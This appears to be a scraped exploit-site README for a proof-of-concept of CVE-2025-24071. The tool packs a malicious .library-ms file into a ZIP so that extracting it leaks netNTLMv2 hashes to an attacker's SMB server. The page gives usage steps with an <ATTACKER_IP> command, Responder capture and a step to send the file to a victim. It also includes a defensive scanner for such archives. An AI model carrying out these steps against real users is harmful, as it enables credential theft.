## https://sploitus.com/exploit?id=49F87252-D177-591F-8704-E0B883F32372
# CVE-2025-24071

This Python script demonstrates the **CVE-2025-24071** vulnerability in Windows Explorer. The vulnerability allows an attacker to capture **netNTLMv2** credentials from a victim with no interaction beyond extracting an archive.

## Description

The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access an SMB location specified in the file, which may result in exposing the victim's credentials to the attacker's server.

This script generates a ZIP file containing a malicious `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location specified in the file, sending **netNTLMv2** credentials to the attacker with no further interaction from the victim.

## How It Works

1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.
   
2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.

3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.

4. The attacker can capture the **netNTLMv2** credentials using tools like **Responder**, without the victim needing to take any further action.
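
The mechanism above also gives defenders something to check before extraction: a `.library-ms` entry inside an archive that names a remote host. The following scanner is an added example, not part of the original script; the function names, the 1 MiB read cap and the sample archive (which uses a TEST-NET address) are assumptions made for illustration.

```python
import io
import re
import sys
import zipfile

# UNC path (\\host\share...) or file:// URL with a host part: both name a remote host.
REMOTE_REF = re.compile(r"(\\\\[\w.\-]+\\[^\s<\"]+|file://[\w.\-]+/[^\s<\"]*)", re.I)
MAX_ENTRY_BYTES = 1024 * 1024  # library definitions are small; cap reads against zip bombs


def decode(raw: bytes) -> str:
    """Decode entry bytes; a BOM marks UTF-16, otherwise assume UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")


def scan_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (entry name, remote reference) for every .library-ms entry naming a remote host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            with zf.open(info) as fh:  # reads the entry in memory; nothing is extracted to disk
                text = decode(fh.read(MAX_ENTRY_BYTES))
            findings += [(info.filename, m.group(0)) for m in REMOTE_REF.finditer(text)]
    return findings


def constructed_sample() -> bytes:
    """Constructed archive: one harmless entry and one entry holding a UNC path fragment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "quarterly report")
        zf.writestr("docs/Report.library-ms", "<url>\\\\192.0.2.10\\share</url>")
    return buf.getvalue()


if __name__ == "__main__":
    # Scan archives named on the command line, or the constructed sample if none are given.
    blobs = {p: open(p, "rb").read() for p in sys.argv[1:]} or {"<sample>": constructed_sample()}
    for name, blob in blobs.items():
        for entry, ref in scan_zip(blob):
            print(f"{name}: {entry} references {ref}")
```

A hit is a triage signal rather than a verdict, since libraries can legitimately include network shares.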

## Requirements

- Python 3.x
- Modules: `zipfile`, `os`, `argparse` (all part of the Python standard library)

## Usage

1. **Generate the malicious file**:

```bash
python exploit.py --ip <ATTACKER_IP>
```

2. Once the malicious file is generated, ensure that Responder is running and listening for the **netNTLMv2** hashes.

```bash
responder -I <INTERFACE>
```

3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.

4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **netNTLMv2** hashes from the victim.

## Disclaimer

This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.